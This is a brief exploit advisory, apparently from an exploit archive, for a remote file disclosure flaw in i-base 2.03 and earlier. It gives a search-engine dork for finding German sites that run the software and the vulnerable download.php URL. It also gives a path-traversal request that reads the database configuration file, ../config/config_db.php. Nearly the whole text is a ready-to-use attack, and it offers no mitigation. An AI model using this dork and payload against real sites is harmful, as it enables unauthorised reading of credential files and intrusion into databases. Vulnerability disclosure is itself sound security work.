ibase versions 2.03 and below suffer from a remote file disclosure vulnerability in download.php.
db39df7e1f419eaccc0f82839b14415f00ce90376e4d077e6c3b90eb5522626a
Name: [AFD] i-base <= 2.03
Author: Dyshoo
Vendor: http://www.i-base.net/
Dork: "inurl:ibase site:de"
http://[site]/ibase/zubehoer/download.php?filename=[file]
Database config:
http://[site]/ibase/zubehoer/download.php?filename=../config/config_db.php